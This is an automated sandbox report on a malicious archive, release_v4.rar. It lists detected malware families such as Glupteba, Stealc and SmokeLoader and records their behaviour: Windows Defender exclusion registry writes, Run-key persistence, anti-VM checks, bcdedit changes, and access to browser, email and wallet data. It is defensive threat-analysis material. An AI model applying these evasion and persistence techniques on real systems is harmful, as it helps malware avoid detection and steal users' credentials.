Analysis Overview
SHA256
f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932
Threat Level: Known bad
The file release_v4.rar was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
ZGRat
Glupteba
Stealc
SmokeLoader
Windows security bypass
Glupteba payload
RisePro
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies boot configuration data using bcdedit
Downloads MZ/PE file
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Checks BIOS information in registry
Reads user/profile data of local email clients
Windows security modification
Identifies Wine through registry keys
Loads dropped DLL
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Drops Chrome extension
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Launches sc.exe
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks processor information in registry
Modifies system certificate store
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Enumerates system info in registry
Uses Task Scheduler COM API
outlook_win_path
Modifies registry class
Modifies Internet Explorer settings
Checks SCSI registry key(s)
Creates scheduled task(s)
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-23 08:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
110s
Max time network
169s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1980 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1980 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1980 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
118s
Max time network
125s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240215-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\rundll32.exe | N/A |
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
Files
memory/1764-0-0x0000000000220000-0x0000000000221000-memory.dmp
memory/1764-1-0x0000000000220000-0x0000000000221000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240220-en
Max time kernel
55s
Max time network
154s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oO_q1f2AwSXGxmbqM3esoqyX.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oO_q1f2AwSXGxmbqM3esoqyX.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\Tasks\beMXFFiCiqlBKkvOrW.job | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6C6B.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
